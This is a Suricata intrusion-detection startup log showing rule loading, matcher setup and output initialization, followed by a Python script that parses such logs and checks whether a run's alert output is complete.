28/6/2019 -- 02:55:10 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-inappropriate.rules
28/6/2019 -- 02:55:10 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-smtp.rules
28/6/2019 -- 02:55:10 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_specific_apps.rules
28/6/2019 -- 02:55:12 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-deleted.rules
28/6/2019 -- 02:55:12 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-malware.rules
28/6/2019 -- 02:55:12 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-snmp.rules
28/6/2019 -- 02:55:12 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-worm.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dns.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-misc.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-sql.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dos.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-netbios.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-telnet.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-exploit.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-p2p.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-tftp.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-mobile_malware.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-botcc.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-compromised.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-drop.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-dshield.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-tor.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-ciarmy.rules
28/6/2019 -- 02:55:13 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/local.rules
28/6/2019 -- 02:55:13 - <Config> - No rules loaded from local.rules.
28/6/2019 -- 02:55:13 - <Info> - 44 rule files processed. 18236 rules successfully loaded, 0 rules failed
28/6/2019 -- 02:55:13 - <Info> - Threshold config parsed: 0 rule(s) found
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for tcp-packet
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for tcp-stream
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for udp-packet
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for other-ip
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_uri
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_request_line
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_client_body
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_response_line
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_header
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_header
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_header_names
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_header_names
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_accept
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_accept_enc
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_accept_lang
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_referer
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_connection
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_content_len
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_content_len
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_content_type
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_content_type
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_protocol
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_protocol
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_start
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_start
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_raw_header
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_raw_header
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_method
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_cookie
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_cookie
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_raw_uri
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_user_agent
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_host
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_raw_host
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_stat_msg
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_stat_code
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for dns_query
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for tls_sni
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for tls_cert_issuer
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for tls_cert_subject
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for tls_cert_serial
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for dce_stub_data
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for dce_stub_data
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for ssh_protocol
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for ssh_protocol
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for ssh_software
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for ssh_software
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for file_data
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for file_data
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_request_line
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_response_line
28/6/2019 -- 02:55:13 - <Info> - 18241 signatures processed. 1175 are IP-only rules, 6125 are inspecting packet payload, 13172 inspect application layer, 0 are decoder event only
28/6/2019 -- 02:55:13 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
28/6/2019 -- 02:55:13 - <Perf> - TCP toserver: 41 port groups, 40 unique SGH's, 1 copies
28/6/2019 -- 02:55:13 - <Perf> - TCP toclient: 21 port groups, 21 unique SGH's, 0 copies
28/6/2019 -- 02:55:13 - <Perf> - UDP toserver: 41 port groups, 33 unique SGH's, 8 copies
28/6/2019 -- 02:55:13 - <Perf> - UDP toclient: 21 port groups, 15 unique SGH's, 6 copies
28/6/2019 -- 02:55:13 - <Perf> - OTHER toserver: 254 proto groups, 2 unique SGH's, 252 copies
28/6/2019 -- 02:55:13 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
28/6/2019 -- 02:55:14 - <Perf> - Unique rule groups: 111
28/6/2019 -- 02:55:14 - <Perf> - Builtin MPM "toserver TCP packet": 31
28/6/2019 -- 02:55:14 - <Perf> - Builtin MPM "toclient TCP packet": 20
28/6/2019 -- 02:55:14 - <Perf> - Builtin MPM "toserver TCP stream": 31
28/6/2019 -- 02:55:14 - <Perf> - Builtin MPM "toclient TCP stream": 21
28/6/2019 -- 02:55:14 - <Perf> - Builtin MPM "toserver UDP packet": 33
28/6/2019 -- 02:55:14 - <Perf> - Builtin MPM "toclient UDP packet": 15
28/6/2019 -- 02:55:14 - <Perf> - Builtin MPM "other IP packet": 2
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_uri": 8
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_request_line": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_client_body": 6
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient http_response_line": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_header": 6
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient http_header": 3
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_header_names": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_accept": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_referer": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_content_len": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_content_type": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient http_content_type": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_start": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_method": 3
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_cookie": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient http_cookie": 2
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_user_agent": 4
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_host": 2
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient http_stat_code": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver dns_query": 4
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver tls_sni": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver file_data": 1
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toclient file_data": 5
28/6/2019 -- 02:55:15 - <Perf> - Registered 18241 rule profiling counters.
28/6/2019 -- 02:55:15 - <Info> - fast output device (regular) initialized: alert
28/6/2019 -- 02:55:15 - <Info> - eve-log output device (regular) initialized: eve.json
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'alert'
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'http'
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'dns'
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'tls'
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'files'
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'ssh'
28/6/2019 -- 02:55:15 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
28/6/2019 -- 02:55:15 - <Info> - stats 

This file has been truncated.
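The log tail above records what matters when judging an automated Suricata run: the number of signatures loaded (18241, split into overlapping IP-only, payload and application-layer categories), the eve-log modules enabled, and the unified2 and fast alert outputs initialized. Below is an added example, not code from this page or from the Suricata project: a small Python parser for this suricata.log line format that pulls those facts out and flags a run whose alerts should not be trusted (no rule-load line, eve-log never initialized, required modules missing). The sample lines are constructed copies of the ones on this page, and the set of eve-log modules treated as required is an assumption for illustration.

```python
import re
from collections import Counter

# Constructed sample in the format Suricata 4.0 writes to suricata.log; the
# lines copy the shape of this page's log tail and are not a live capture.
# The final line ("This file has been truncated.") is deliberately not a log
# line, to show that the parser skips it.
SAMPLE_LOG = """\
28/6/2019 -- 02:55:13 - <Perf> - using shared mpm ctx' for http_user_agent
28/6/2019 -- 02:55:13 - <Info> - 18241 signatures processed. 1175 are IP-only rules, 6125 are inspecting packet payload, 13172 inspect application layer, 0 are decoder event only
28/6/2019 -- 02:55:13 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
28/6/2019 -- 02:55:14 - <Perf> - AppLayer MPM "toserver http_uri": 8
28/6/2019 -- 02:55:15 - <Info> - fast output device (regular) initialized: alert
28/6/2019 -- 02:55:15 - <Info> - eve-log output device (regular) initialized: eve.json
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'alert'
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'http'
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'dns'
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'tls'
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'files'
28/6/2019 -- 02:55:15 - <Config> - enabling 'eve-log' module 'ssh'
28/6/2019 -- 02:55:15 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
28/6/2019 -- 02:55:15 - <Info> - stats
This file has been truncated.
"""

# One suricata.log line: "<d>/<m>/<yyyy> -- <hh:mm:ss> - <Level> - <message>"
LINE_RE = re.compile(
    r"^(?P<date>\d{1,2}/\d{1,2}/\d{4}) -- (?P<time>\d{2}:\d{2}:\d{2}) - "
    r"<(?P<level>\w+)> - (?P<msg>.*)$"
)
SIG_RE = re.compile(
    r"(?P<total>\d+) signatures processed\. (?P<iponly>\d+) are IP-only rules, "
    r"(?P<payload>\d+) are inspecting packet payload, "
    r"(?P<applayer>\d+) inspect application layer, "
    r"(?P<deonly>\d+) are decoder event only"
)
EVE_MODULE_RE = re.compile(r"enabling 'eve-log' module '(?P<module>[^']+)'")
OUTPUT_RE = re.compile(
    r"^(?P<kind>[\w-]+) output device \((?P<mode>\w+)\) initialized: (?P<target>\S+)$"
)
UNIFIED2_RE = re.compile(
    r"^Unified2-alert initialized: filename (?P<file>\S+), limit (?P<limit>\d+) MB$"
)

# Assumption for this example: the eve-log modules an analyst needs present
# before trusting the run's alert and metadata output.
REQUIRED_EVE_MODULES = {"alert", "http", "dns", "tls", "files"}


def parse_lines(text):
    """Yield (level, message) for each well-formed log line; skip anything else."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw.rstrip())
        if m:
            yield m.group("level"), m.group("msg")


def summarize(text):
    """Collect rule-load counts, enabled eve-log modules and output devices."""
    summary = {
        "levels": Counter(),
        "signatures": None,
        "eve_modules": [],
        "outputs": {},  # output kind (fast, eve-log, ...) -> target file
        "unified2": None,
    }
    for level, msg in parse_lines(text):
        summary["levels"][level] += 1
        m = SIG_RE.search(msg)
        if m:
            summary["signatures"] = {k: int(v) for k, v in m.groupdict().items()}
            continue
        m = EVE_MODULE_RE.search(msg)
        if m:
            summary["eve_modules"].append(m.group("module"))
            continue
        m = OUTPUT_RE.match(msg)
        if m:
            summary["outputs"][m.group("kind")] = m.group("target")
            continue
        m = UNIFIED2_RE.match(msg)
        if m:
            summary["unified2"] = {"file": m.group("file"), "limit_mb": int(m.group("limit"))}
    return summary


def category_overlap(sigs):
    """How far the four categories over-count the total. Suricata counts a rule
    in every category it belongs to, so a rule inspecting both packet payload
    and application layer is counted twice; the result is > 0 on real rulesets."""
    return sigs["iponly"] + sigs["payload"] + sigs["applayer"] + sigs["deonly"] - sigs["total"]


def check_run(summary):
    """Return the problems that would make this run's alert output untrustworthy."""
    problems = []
    sigs = summary["signatures"]
    if sigs is None:
        problems.append("no 'signatures processed' line: ruleset may not have loaded")
    elif sigs["total"] == 0:
        problems.append("0 signatures loaded")
    missing = REQUIRED_EVE_MODULES - set(summary["eve_modules"])
    if missing:
        problems.append("eve-log modules not enabled: " + ", ".join(sorted(missing)))
    if "eve-log" not in summary["outputs"]:
        problems.append("eve-log output device never initialized")
    return problems


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    print("signatures:", s["signatures"], "overlap:", category_overlap(s["signatures"]))
    print("eve modules:", s["eve_modules"], "outputs:", s["outputs"], "unified2:", s["unified2"])
    print("problems:", check_run(s) or "none")
```

Run it against a real suricata.log by replacing SAMPLE_LOG with the file's contents; a non-empty list from check_run means the alert file and eve.json from that run are incomplete and the capture should be re-analysed before any of the alerts are acted on.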